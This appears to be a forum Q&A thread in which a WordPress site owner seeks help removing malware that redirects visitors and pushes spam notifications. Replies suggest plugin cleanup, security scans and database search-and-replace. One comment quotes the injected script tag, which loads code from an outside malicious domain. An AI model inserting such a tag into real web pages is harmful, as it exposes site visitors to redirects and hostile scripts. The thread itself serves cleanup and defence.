# How do I Remove Malware on Wordpress Website when I have cleaned up files?

Tags: wordpress, malware

WARNING - Website contains malware.

Website is https://officialsportips[.]com

Hello, My wordpress site contains malware and when navigating to the home page it points to: line[.]storerightdesicion[.]com and then other sites and bombards the user with push notifications.

The website is hosted with Bluehost and they provided me with scan results and I have cleaned up all the files but the malware is still present.

Does anyone know what else it may be and can check(in a test environment)?

Comment: Please go to the plugins folder and see if there's any unwanted plugins exists. If so, removing those may resolve the issue. Also please install a security plugin like Wordfence Security and perform a Scan to ensure there's no malicious files.

Comment: Hi @RobyRajuOommen, thanks for your response. I have removed unnecessary plugins and also have Wordfence Security installed and removed the critical files that needed changing.

Comment: Is the issue resolved then?

Comment: Found this at the bottom of each page but can't seem to remove it as if I click edit page it runs the script. I've also tried a plugin called string locator but no luck <script src='https://line.storerightdesicion.com/ping/?str.js' type='text/javascript'></script>

Comment: Are the mentioned scripts being inserted in the files? If so, please use FTP or CPanel to edit the files instead of WordPress theme editor.

Comment: They are in the Wordpress pages and I’m not sure where they are located in CPanel

Comment: So, the content is fetching from the page editor on WordPress? And you found the mentioned malicious script within the page editor?

Comment: Yeah, I found it when I went on to page history and did a side by side page comparison but can't edit the page as the malware appears

Comment: Please try to restore to the previous revision of the page instead of editing it. Otherwise, if you have database access, then export the database and try to edit it in a text editor, remove the script and import the database again.

Answer (score 0):

It is in the database.
Use the plugin search/replace and look for the string storerightdecision and delete the entire string.

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Answer (score 0):

Use a plugin named "Better Search Replace". Search for this string "storerightdesicion" on all database tables. I hope you will see the infected table field and then clean the code from the database.